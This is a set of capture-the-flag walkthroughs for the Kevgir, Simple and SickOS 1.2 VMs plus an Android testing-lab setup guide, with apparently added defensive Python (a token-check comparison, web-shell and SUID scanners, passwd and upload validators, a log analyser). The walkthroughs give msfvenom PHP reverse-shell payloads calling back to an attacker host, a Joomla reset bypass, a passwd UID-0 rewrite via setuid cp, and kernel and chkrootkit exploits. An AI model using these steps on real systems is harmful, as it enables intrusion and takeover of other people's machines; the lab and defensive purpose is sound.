Hack the Kevgir VM (CTF Challenge)


In this article we will walk through a boot2root penetration testing challenge, Kevgir. Kevgir is a vulnerable framework based on the concept of CTF (Capture The Flag). This lab can be solved in multiple ways; one of them is used in this article.

Penetration Methodology
- Network Scanning (Nmap, netdiscover)
- Scanning the Joomla-based CMS (Joomscan)
- Exploiting the target (exploit 6234)
- Logging into the admin console
- Generating a PHP backdoor (Msfvenom)
- Uploading and executing the backdoor
- Reverse connection (Metasploit)
- Importing the Python one-liner for a proper TTY shell
- Finding SUID binaries for privilege escalation
- Abusing the shadow and passwd files
- Getting root access and capturing the flag

Let's start!!!
First, download the Kevgir VM from here.
Start off with finding the target using:
netdiscover

Our target is 192.168.1.102. Now scan the target with nmap:
nmap -p- -A 192.168.1.102
With the nmap scan you can see that ports 80, 139, 2049, 6379, 8080, 8081, 9000, 40383 and many others are open, as you can see in the image.




Also, if you observe, you can see that port forwarding is used here, e.g. the HTTP service is open on ports 80, 8080 and 8081. So let us try opening our target on ports 80 and 8081.
On port 80 our target opens as follows:

And on port 8081 it opens as:

The CMS of the website is Joomla, and this version of Joomla, as everyone knows, is exploitable. We will scan the target with joomscan:
joomscan -u http://192.168.1.102:8081




Running joomscan lists the known vulnerabilities. Here we can observe the highlighted text pointing towards "Admin Password changed", which appears to be vulnerable to exploit 6234. If you look closely, exploit number 6234 shows you the steps to exploit this particular vulnerability.




As described there, browse to the following URL:
192.168.1.102:8081/index.php?option=com_user&view=reset&layout=confirm
Here it will ask you for a token; type an apostrophe (') in the token text box.

It will redirect you to a page where it asks you to set up a new password.

After setting the new password, log in with the username and the password that you have just set.
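Why a lone apostrophe gets past the token check is worth understanding, since that is the whole of exploit 6234. In the affected Joomla 1.5 releases the reset form passed the submitted token through an alphanumeric filter, so `'` became the empty string, and the lookup that followed matched any account whose activation field was already blank, which is the state of every active account, the admin's included. The Python analog below is an added example, not Joomla's code and not part of the original article: it places that flawed lookup beside a hardened version that rejects anything which is not a well-formed, currently issued token and compares it in constant time. The user table, ids and token length are constructed for the example.

```python
import hmac
import secrets

TOKEN_LEN = 32  # hex digits in a freshly issued reset token (constructed)


def make_users():
    """Constructed user table. 'activation' holds a pending reset token, or ''
    once the account is active; the admin row mirrors a fresh install."""
    return [
        {"id": 62, "username": "admin", "activation": ""},
        {"id": 63, "username": "alice", "activation": ""},
    ]


def sanitize_alnum(value):
    """Keep ASCII letters and digits only, mimicking an 'alnum' request
    filter. A lone apostrophe comes out as the empty string."""
    return "".join(ch for ch in value if ch.isascii() and ch.isalnum())


def issue_reset_token(user):
    """Store a random 32-hex-digit token on the account and return it."""
    token = secrets.token_hex(TOKEN_LEN // 2)
    user["activation"] = token
    return token


def confirm_reset_vulnerable(token_input, users):
    """Look the filtered token up directly. With token == '' this matches
    the first active account, so the caller gets to reset that account."""
    token = sanitize_alnum(token_input)
    for user in users:
        if user["activation"] == token:
            return user["id"]
    return None


def confirm_reset_hardened(token_input, users):
    """Accept only a well-formed token that is currently issued to someone:
    enforce the length, skip accounts with no pending token, and compare
    in constant time so timing does not leak which prefix matched."""
    token = sanitize_alnum(token_input)
    if len(token) != TOKEN_LEN:
        return None
    for user in users:
        if user["activation"] and hmac.compare_digest(user["activation"], token):
            return user["id"]
    return None
```

With the vulnerable check, `confirm_reset_vulnerable("'", make_users())` resolves to the admin id; the hardened check returns nothing for the same input and only succeeds for a token that `issue_reset_token` actually handed out.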





Now that you are logged in, go to the Extensions menu and select Template Manager from the drop-down menu.

Then choose Extensions > Template Manager > rhuk_milkyway > Edit HTML.






Here we can add our own PHP code, but instead of editing the genuine PHP of the template we will add malicious PHP code.





Create the malicious code that you are going to upload with msfvenom:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw
On the other hand, run multi/handler inside the Metasploit framework.




Copy the code from <?php to die(); and paste it inside the HTML editor, then click the Save button.
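A defender's check for what this step leaves behind: a PHP template edited through the administrator console looks like any other template file, but the pasted payload carries traits that ordinary template code does not (a socket connect-back, eval of a decoded blob, command-execution functions, or a very long base64 run). The scanner below is an added example, not from the original article, that walks a template tree and flags .php files matching such indicators. The indicator set and the two sample fragments are constructed; the final allow/deny decision is left to the reviewer.

```python
import re
from pathlib import Path

# Patterns characteristic of PHP droppers and web shells (constructed set).
INDICATORS = {
    "eval_decoded_blob": re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)", re.I),
    "socket_connect": re.compile(r"\b(fsockopen|stream_socket_client|socket_create)\s*\(", re.I),
    "command_exec": re.compile(r"\b(shell_exec|passthru|proc_open|popen)\s*\(", re.I),
    "long_base64": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
}


def scan_php_source(source):
    """Return the sorted list of indicator names that fire on one file's text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(source))


def scan_template_dir(root):
    """Walk a template tree (e.g. a Joomla templates/ directory) and map each
    .php file that trips an indicator to the indicators it tripped."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        hits = scan_php_source(path.read_text(errors="replace"))
        if hits:
            findings[str(path)] = hits
    return findings


# Constructed samples: a normal template guard line, and a dropper-shaped
# fragment of the kind an attacker would paste between <?php and die();
BENIGN_TEMPLATE = (
    "<?php defined('_JEXEC') or die('Restricted access'); ?>\n"
    "<html><body>Hello</body></html>\n"
)
DROPPER_FRAGMENT = (
    "/*<?php /**/ error_reporting(0); $ip = '192.168.1.108'; $port = 4444;\n"
    "$s = stream_socket_client(\"tcp://{$ip}:{$port}\");\n"
    "eval(base64_decode('" + "QUFB" * 100 + "')); die();\n"
)

if __name__ == "__main__":
    import sys
    for path, hits in scan_template_dir(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, ", ".join(hits))
```

Run it against the templates directory on a schedule and diff the output against the last clean run; a template that suddenly trips `socket_connect` or `eval_decoded_blob` is exactly the artifact this walkthrough produces.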




Meanwhile, return to the Metasploit terminal and wait for the meterpreter session by running the multi handler.
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.108
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit

From the image below you can observe Meterpreter session 1. But the task is not finished yet; we still need to penetrate further for privilege escalation.
meterpreter > sysinfo
meterpreter > shell




Then, to get a proper TTY shell, we import the pty module with a Python one-liner:
python -c 'import pty;pty.spawn("/bin/bash")'

Now for privilege escalation we can either use the find command to enumerate system binaries with the SUID bit set, or move into /bin and list its files to look for the SUID bit.
find / -perm -u=s -type f 2>/dev/null
or
cd /bin
ls -al

Hence we can clearly observe that the SUID bit is set on cp, the copy command, which lets us copy any file that would otherwise require higher privileges for read/write operations, such as /etc/passwd and /etc/shadow.
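The same enumeration from the defender's side: the find command above lists every setuid file, but the question that matters is which of them should not be there. The following Python script is an added example, not part of the original article. It reproduces the find query with os.walk and compares the result with an allowlist of setuid binaries expected on a stock Debian/Ubuntu host (that allowlist is an assumption; build yours from a known-good machine). The audit function takes (path, mode) pairs, so it can also be run over a listing captured from another host.

```python
import os
import stat

# setuid-root programs present on a stock Debian/Ubuntu system.
# Illustrative allowlist (an assumption); derive yours from a known-good host.
EXPECTED_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/fusermount",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/pkexec",
}


def scan_suid(root="/"):
    """Yield (path, mode) for every regular file under root with the setuid
    bit, the same set that `find / -perm -u=s -type f` prints."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # unreadable or vanished entry; skip it
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_mode


def audit_suid(entries, expected=EXPECTED_SUID):
    """Return [(path, [reasons])] for the entries a reviewer should look at:
    setuid files outside the allowlist, and any that are world-writable."""
    findings = []
    for path, mode in entries:
        reasons = []
        if path not in expected:
            reasons.append("not in allowlist")
        if mode & stat.S_IWOTH:
            reasons.append("world-writable")
        if reasons:
            findings.append((path, reasons))
    return findings


if __name__ == "__main__":
    for path, reasons in audit_suid(scan_suid("/")):
        print(path, ", ".join(reasons))
```

Run it as root so that directories a normal user cannot read are covered. Anything reported as not in the allowlist, a setuid copy of cp in particular, should be reverted with chmod u-s unless a documented reason for it exists.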




Therefore we copied /etc/shadow into /tmp and opened it there. The shadow file holds the hashed passwords of users, and we copied the password hash for the user admin as shown.




Now we pasted the copied text into an empty file and used John the Ripper to crack this hash. As a result you can observe the password admin for the user admin. This method is known as SUID binary privilege escalation; for more detail read this article.




But the task is not completed yet: this is a boot to root challenge and we still lack root privileges. Now open the passwd file with cat, where you will find an entry for admin. Since we now know the admin user's password, we can increase his privileges by manipulating his entry, and to do so copy the whole content of this file.




Paste it into an empty text file, then modify UID 1002 & GID 1002 to UID 0 & GID 0 so that admin becomes a member of the root group, and save it as passwd so that we can replace the original passwd file with our modified one.




Download the modified passwd file into the /tmp directory with wget, as shown.
wget http://192.168.1.108/passwd
Now replace the original passwd file with our modified one using the cp command; this is possible because the SUID bit is set on /bin/cp. Then switch user with su and you will get root access, as shown below.
cp passwd /etc/
su admin
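What this change looks like to someone auditing the box afterwards is a second UID 0 entry in /etc/passwd. The following Python audit is an added example, not from the original article; it parses passwd(5) lines and reports a non-root account with UID 0, an empty password field, and duplicate UIDs. The sample passwd content is constructed to resemble the modified file described above.

```python
PASSWD_FIELDS = ("name", "password", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text):
    """Parse passwd(5) content into a list of dicts, one per account."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        parts = line.split(":")
        if len(parts) != len(PASSWD_FIELDS):
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(parts)}")
        entries.append(dict(zip(PASSWD_FIELDS, parts)))
    return entries


def audit_passwd(text):
    """Return human-readable findings for the account changes that matter
    here: a non-root account given UID 0, an empty password field (login
    without a password), or a UID shared by two accounts."""
    findings = []
    seen_uid = {}
    for entry in parse_passwd(text):
        name, uid = entry["name"], int(entry["uid"])
        if uid == 0 and name != "root":
            findings.append(f"{name}: UID 0 but not root")
        if entry["password"] == "":
            findings.append(f"{name}: empty password field (no password required)")
        if uid in seen_uid:
            findings.append(f"{name}: duplicate UID {uid} (also {seen_uid[uid]})")
        else:
            seen_uid[uid] = name
    return findings


# Constructed sample resembling the modified file in the walkthrough: the
# admin row has had its UID and GID rewritten from 1002 to 0.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
admin:x:0:0:admin:/home/admin:/bin/bash
"""

if __name__ == "__main__":
    with open("/etc/passwd") as fh:
        for finding in audit_passwd(fh.read()):
            print(finding)
```

On the constructed sample the audit reports admin twice, once for holding UID 0 and once for sharing it with root. Pair a check like this with file-integrity monitoring on /etc/passwd and /etc/shadow, since the copy performed through a setuid cp leaves no package-manager trace.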

HURRAYYYY!!! We hit the goal and finished this task. But this lab can be solved in multiple ways, for example by using a kernel exploit for privilege escalation.
Try it yourself and enjoy the CTF challenges!!



Hack the Simple VM (CTF Challenge)


Simple CTF is a boot2root that focuses on the basics of web-based hacking. Once you load the VM, treat it as a machine you can see on the network, i.e. you don't have physical access to this machine. Therefore, tricks like editing the VM's BIOS or Grub configuration are not allowed. Only remote attacks are permitted. /root/flag.txt is your ultimate goal. In this article I will walk you through the whole method of completing this challenge.
First, download the Simple VM from here.
Breaching Methodology:
- Network Scanning (Netdiscover, Nmap)
- Enumerating the file upload vulnerability (searchsploit)
- Generating a PHP backdoor (Msfvenom)
- Uploading and executing the backdoor
- Reverse connection (Metasploit)
- Importing the Python one-liner for a proper TTY shell
- Kernel privilege escalation
- Getting root access and capturing the flag

We start by identifying our target with the following command:
netdiscover

Our target is 192.168.1.106.
Then move on to scanning our target with nmap:
nmap -A 192.168.1.106

On scanning, you will find that port 80 is open and that it points to CuteNews. So we will now open it in our browser.




Now we can see that our target is using CuteNews v2.0.3, and the good news is that it is exploitable, so let's search for its exploit:
searchsploit cutenews 2.0.3




Upon searching for the exploit we can see the path to it. Follow the path and open the exploit's ".txt" file. In the text file you will find the instructions for uploading the file. First it tells us to register on the website in order to be able to upload a file.




To register, it will ask you for a username and password as shown below.




When you complete the registration steps, it will redirect you to the following window:




Now we need to upload the file, so create it with the following msfvenom command:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw
On the other hand, run multi/handler inside the Metasploit framework.




Copy the code from <?php to die(); and save it in a file with the .php extension. To upload the file, log in with the username you have just registered, then click on Personal options, give your username and mail ID, browse to the file that you want to upload and click on Save.




Now we will use dirb to find the directories, and for that type:
dirb http://192.168.1.106




It will show you the /uploads directory. This is the directory where your file has been uploaded. Open the directory in the browser and you will find your uploaded file there.
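The CuteNews weakness used above is an upload form that trusts the client's filename, so a .php file lands in a web-served /uploads directory and runs when fetched. The Python function below is an added example, not CuteNews code and not part of the original article: it shows the checks an avatar upload handler should make (an extension allowlist, a magic-byte check against the declared type, a scan for script markers, a size cap and a server-chosen random name). The size limit and the marker list are assumptions.

```python
import os
import secrets

# Allowed extension -> magic bytes the content must begin with.
IMAGE_MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}
# Markers that have no business inside image data (assumed list).
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")
MAX_SIZE = 512 * 1024  # hypothetical avatar size limit


def validate_upload(filename, content):
    """Decide whether an avatar upload may be stored.

    Returns (ok, detail): detail is the rejection reason, or the random
    server-side name the file should be stored under."""
    # Strip any directory component the client supplied (Windows or POSIX).
    base = os.path.basename(filename.replace("\\", "/"))
    ext = base.rsplit(".", 1)[1].lower() if "." in base else ""
    if ext not in IMAGE_MAGIC:
        return False, f"extension '{ext or '(none)'}' is not an image type"
    if len(content) > MAX_SIZE:
        return False, "file too large"
    if not content.startswith(IMAGE_MAGIC[ext]):
        return False, "content does not match the declared image type"
    if any(marker in content for marker in SCRIPT_MARKERS):
        return False, "script markers embedded in image data"
    # Never keep the client's name: choose one that cannot collide or carry
    # a second extension, and store it outside the web root.
    return True, f"{secrets.token_hex(8)}.{ext}"
```

The last check matters because a real JPEG header followed by PHP code (a polyglot) passes the magic-byte test on its own. Independently of the validation, serve the upload directory with script execution disabled (for Apache with mod_php, `php_admin_flag engine off` or `RemoveHandler .php` scoped to that directory), so that a file which slips through is returned as data rather than run.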




Meanwhile, return to the Metasploit terminal and wait for the meterpreter session by running the multi handler.
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.108
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit
From the image below you can observe Meterpreter session 1. But the task is not finished yet; we still need to penetrate further for privilege escalation.
shell
And if you type the following two commands to import pty from a Python file and reach a terminal, it will not work, as the version of Python is updated:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
cd /tmp




Using the sysinfo command I came to know the machine architecture, which helps in finding a kernel exploit for privilege escalation, and with the help of a Google search we got exploit 36746.




As we know that this version of the kernel is vulnerable, we will download its exploit with the command given below:
wget https://www.exploit-db.com/download/36746
This will download the exploit. Moving forward, we will compile the file:
gcc 36746.c -o access -static
Now we will run the compiled file, access:
./access
Then type id to check which user you are, and then type:
cd /root
which will take you into /root. Further type:
ls
It will list the files, and one of them will be flag.txt. To read the flag type:
cat flag.txt


Hack the SickOS 1.2 VM (CTF Challenge)


In this walkthrough I will explain how to solve the SickOs 1.2 challenge. This OS is the second in the SickOs series and is independent of the prior release; the scope of the challenge is to gain the highest privileges on the system. This CTF gives a clear analogy of how hacking strategies can be performed on a network to compromise it, in a safe environment.
First, download SickOs from here.
Breaching Methodology:

- Network Scanning (Netdiscover, Nmap)
- Directory brute-force (dirb)
- Finding HTTP options: PUT (curl)
- Generating a PHP backdoor (Msfvenom)
- Installing Poster (Firefox plug-in)
- Uploading and executing the backdoor
- Reverse connection (Metasploit)
- Privilege escalation (cron job)
- Importing the Python one-liner for a proper TTY shell
- Getting root access and capturing the flag

Let's start!!
So, first let us find our target using:
netdiscover

Our target is 192.168.1.109. Further, we will run an nmap scan:
nmap -A 192.168.1.109




As you can see, port 80 is open, which means we can open this IP in the browser. Why not do that?




Opening the IP in the browser shows us the above image, which is of no use. You can try looking into the page source, but unfortunately you will find nothing there. That is why we will use dirb to find the directories, and for that type:
dirb http://192.168.1.109




As a result you can see that we have found our directory, i.e. test. Open it in the browser as well.
192.168.1.109/test/



It will show you the directory listing. So let us try and explore the test directory via curl:
curl -v -X OPTIONS http://192.168.1.109/test
This will show you that PUT is allowed, which means you can upload any file through it.
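From the defender's side, the OPTIONS probe and the PUT that follows both show up in the web server's access log. The Python below is an added example, not part of the original article: it parses combined-format log lines and reports requests using state-changing methods, plus the OPTIONS probes that typically precede them. The log lines are constructed to mirror the sequence in this walkthrough.

```python
import re

# Combined log format as written by Apache/nginx (constructed lines below follow it).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Methods that change server state; none of them belong on a static /test/ tree.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_write_requests(lines):
    """(ip, method, path, status) for each request that used a write method."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] in WRITE_METHODS:
            hits.append((rec["ip"], rec["method"], rec["path"], int(rec["status"])))
    return hits


def find_options_probes(lines):
    """(ip, path) for OPTIONS requests, the reconnaissance step before a PUT."""
    return [(r["ip"], r["path"]) for r in map(parse_line, lines)
            if r and r["method"] == "OPTIONS"]


# Constructed sample log reproducing the sequence in this walkthrough:
# a normal visitor, then an OPTIONS probe, a PUT, and a fetch of the new file.
SAMPLE_LOG = [
    '192.168.1.50 - - [10/Mar/2018:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.1.108 - - [10/Mar/2018:12:00:10 +0000] "OPTIONS /test HTTP/1.1" 200 0 "-" "curl/7.58.0"',
    '192.168.1.108 - - [10/Mar/2018:12:00:30 +0000] "PUT /test/shell.php HTTP/1.1" 201 0 "-" "Mozilla/5.0"',
    '192.168.1.108 - - [10/Mar/2018:12:00:45 +0000] "GET /test/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_write_requests(SAMPLE_LOG):
        print("write request:", hit)
    for probe in find_options_probes(SAMPLE_LOG):
        print("OPTIONS probe:", probe)
```

A PUT answered with 201 or 204 on a tree that should be read-only is worth an alert on its own. To remove the condition rather than detect it, restrict the directory to the methods it needs (in Apache, a `<LimitExcept GET POST HEAD>` block containing `Require all denied`).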




So, prepare the malicious file that you will upload with msfvenom:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=443 -f raw
On the other hand, run multi/handler inside the Metasploit framework.
Copy the code from <?php to die(); and paste it into a text file with the .php extension, for example shell.php, ready to upload.




Now, to upload your .php file we will use the Poster add-on. Click on Tools in the menu bar, then click on Poster in the drop-down menu. The following dialog box will open. Here, browse to the file that you will upload and click on the PUT option.




It will show you that the file is uploaded.




And you can see the same in your browser: your file has been uploaded (in our case the file is shell.php). Now run the file you just uploaded.




Meanwhile, return to the Metasploit terminal and wait for the meterpreter session by running the multi handler.
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.108
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit

From the image below you can observe Meterpreter session 1. But the task is not finished yet; we still need to penetrate further for privilege escalation.
Then I checked for cron jobs inside /etc/crontab and found some scheduled jobs there.




Moving further, type the following to explore more and find something exploitable:
ls -l /etc/cron.daily
The above command will list the files. On observing you can see that there is chkrootkit. Some of its versions are exploitable, therefore we will check its version, and for that type:
chkrootkit -V
It will show you the version, which is 0.49.




With the help of Google we came to know that Metasploit contains an exploit for chkrootkit. Enter the commands shown in the image to load the exploit/unix/local/chkrootkit module, then set session 1 and an arbitrary lport such as 8080, and run the module.
This will give another session; as you can see, we have spawned a command shell on the target machine. Now if you check the uid by typing id, it will show uid=0, i.e. root.
id
cd /root
And to see the list of files in /root type:
ls -lsa
In the list you will see a text file, and to read it type:
cat 7d83aaa2bf93d8040f3f22ec6ad9d5a.txt

Build an Android Penetration Testing lab


Nowadays the number of mobile users is increasing day by day, and the security threat is increasing along with the growth in users. These threats can disrupt the operation of the smartphone and transmit or modify user data. For these reasons, the applications deployed there should ensure the privacy and integrity of the information they manage. Mobile security involves protecting personal and business information stored on and transmitted from smartphones, tablets, laptops and other mobile devices. Mobile security has become very important in mobile computing as a result of the day-by-day increase in sophisticated attack methods. So now we will see how to exploit and analyze an Android application for vulnerabilities.

So first we have to set up an environment for Android application testing.
Requirements for Android penetration testing:
- VirtualBox
- Santoku OS, which comes with preinstalled SDKs
- Genymotion, for creating an Android Virtual Device (AVD)
- A vulnerable Android app, "InsecureBankv2"

Let's start...
So first download Santoku OS from here. Santoku OS is built especially for mobile penetration testing and forensic investigation. It comes with pre-installed SDKs and other utilities. There is also a bunch of forensic tools, like firmware flashing tools for multiple vendors and other forensic scripts for enumerating app details, etc.

After downloading Santoku, open VirtualBox and create a new virtual machine for it.


Now select the RAM for the Santoku VM; the recommended amount is 786MB but I took 2GB. You can select according to your own need, then click Next.


In this section select the hard disk type as per your need, or select VMDK (Virtual Machine Disk).


Here select the size of the hard disk as you wish and then create the VM.



Now, to install Santoku on the VM we created, right-click on the Santoku VM and go to Settings > Storage, then select the empty disk, click on the disk icon in front of the optical drive in the Attributes section, browse to and select the downloaded Santoku ISO file, and click OK.



Finally launch the VM; after a few seconds the Santoku boot menu will appear. Select "Install - start the installer directly".


Now the installation process will begin. Select your preferred language, click on Continue and then click on Install Now.



Select your preferred language for the keyboard.


Now in this section name your VM and set a strong password for login access. You can also choose Log in automatically, but that is not a good choice.


Now Santoku will start copying files and installing. Sit back and wait for a few minutes, after which it will restart.


Here our Santoku is installed, which means our first part is completed.

Now you can download Genymotion from here.

Basically, Genymotion is a relatively fast Android emulator which comes with pre-configured Android images with OpenGL hardware acceleration, suitable for application testing.

After installing Genymotion, go to https://www.genymotion.com/account/create/ and create a free account there, then verify your email ID. Then come back to the Genymotion desktop software and log in there using the newly created account credentials.


Now, to create an AVD click on 'Add'; a new menu will appear where you can select Android devices according to device brand and version number.


Select the device according to your need and click Next. Then in this section review the configuration of the Android mobile device and finally create the virtual device.


Now the device will start downloading the data and deploy the virtual Android device.


Here you can see I created 2 virtual devices. Now select a device and launch it.

Here is our Android Virtual Device.


To test our application for any kind of vulnerability we need the Android SDK, because in our testing phase we will be using the ADB (Android Debug Bridge) command line almost all the time. The Android SDK is preinstalled in Santoku OS. So now we are going to connect Santoku to our Android Virtual Device.

First check the IP of the Android Virtual Device.


Now open a command line in Santoku and type (using the IP of the virtual device noted above):
adb connect <AVD-IP>
You can check whether the device is connected or not by typing:
adb devices

So here we can see that the list shows 1 device connected.


And here you can also open a shell on the Android device by typing:
adb shell

So here the creation of a penetration testing lab for Android applications is completed. Now stay tuned for the next article on actual Android app penetration testing and hacking.